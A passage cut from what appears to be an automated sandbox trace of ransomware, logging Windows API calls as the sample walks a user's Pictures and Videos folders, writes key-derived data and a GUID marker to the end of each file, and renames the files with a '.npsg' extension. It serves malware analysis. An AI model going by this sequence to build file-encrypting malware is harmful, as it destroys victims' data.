KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.482] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.483] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.483] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.483] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.484] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.484] GetLastError () returned 0x0 [0238.484] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.484] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.484] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.484] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.484] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.484] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.485] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf961, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.485] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.486] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.486] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.486] CloseHandle (hObject=0x644) returned 1 [0238.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0238.488] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zjWn8TQ2-F nbNaC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\zjwn8tq2-f nbnac.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zjWn8TQ2-F nbNaC.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\zjwn8tq2-f nbnac.gif.npsg")) returned 1 [0238.489] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c42e140, ftCreationTime.dwHighDateTime=0x1d5c4ae, ftLastAccessTime.dwLowDateTime=0x4ae6bf50, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0x4ae6bf50, ftLastWriteTime.dwHighDateTime=0x1d5bd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15f34, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zPSkJFc19SQxyhIpDt3.png", cAlternateFileName="ZPSKJF~1.PNG")) returned 1 [0238.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.490] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zPSkJFc19SQxyhIpDt3.png") returned=".png" [0238.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zPSkJFc19SQxyhIpDt3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\zpskjfc19sqxyhipdt3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.490] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=89908) returned 1 [0238.490] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.493] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x15f0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.493] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.495] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x15f34, lpOverlapped=0x0) returned 1 [0238.496] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.497] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.497] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.497] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.498] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.498] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.498] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.498] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.498] GetLastError () returned 0x0 [0238.498] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.498] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.498] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.498] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.498] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.499] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.500] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x15f34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.500] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.500] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.500] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.500] CloseHandle (hObject=0x644) returned 1 [0238.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0238.502] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zPSkJFc19SQxyhIpDt3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\zpskjfc19sqxyhipdt3.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\zPSkJFc19SQxyhIpDt3.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\zpskjfc19sqxyhipdt3.png.npsg")) returned 1 [0238.504] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c42e140, ftCreationTime.dwHighDateTime=0x1d5c4ae, ftLastAccessTime.dwLowDateTime=0x4ae6bf50, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0x4ae6bf50, ftLastWriteTime.dwHighDateTime=0x1d5bd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15f34, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zPSkJFc19SQxyhIpDt3.png", cAlternateFileName="ZPSKJF~1.PNG")) returned 0 [0238.504] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0238.505] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0238.505] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0238.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0238.506] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.506] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.506] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.506] PathFindFileNameW (pszPath="") returned="" [0238.506] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5ceb1d0, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x342d30a0, ftLastAccessTime.dwHighDateTime=0x1d5b5e6, ftLastWriteTime.dwLowDateTime=0x342d30a0, ftLastWriteTime.dwHighDateTime=0x1d5b5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.508] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5ceb1d0, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x342d30a0, ftLastAccessTime.dwHighDateTime=0x1d5b5e6, ftLastWriteTime.dwLowDateTime=0x342d30a0, ftLastWriteTime.dwHighDateTime=0x1d5b5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.508] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82cddf0, ftCreationTime.dwHighDateTime=0x1d5c11e, ftLastAccessTime.dwLowDateTime=0x8fcf32a0, ftLastAccessTime.dwHighDateTime=0x1d5beb0, ftLastWriteTime.dwLowDateTime=0x8fcf32a0, ftLastWriteTime.dwHighDateTime=0x1d5beb0, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0eJ0GSYNwi.mp4", cAlternateFileName="0EJ0GS~1.MP4")) returned 1 [0238.508] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\0eJ0GSYNwi.mp4") returned=".mp4" [0238.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\0eJ0GSYNwi.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\0ej0gsynwi.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.509] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=1472) returned 1 [0238.509] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.512] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x59a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.512] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.514] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x5c0, lpOverlapped=0x0) returned 1 [0238.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.514] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.514] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.515] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.515] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.515] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.515] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.515] GetLastError () returned 0x0 [0238.515] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.515] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.515] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.516] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.516] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.516] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.516] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.516] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.517] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.517] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.517] CloseHandle (hObject=0x644) returned 1 [0238.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b88cd0 [0238.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.520] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\0eJ0GSYNwi.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\0ej0gsynwi.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\0eJ0GSYNwi.mp4.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\0ej0gsynwi.mp4.npsg")) returned 1 [0238.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.521] HeapFree (in: 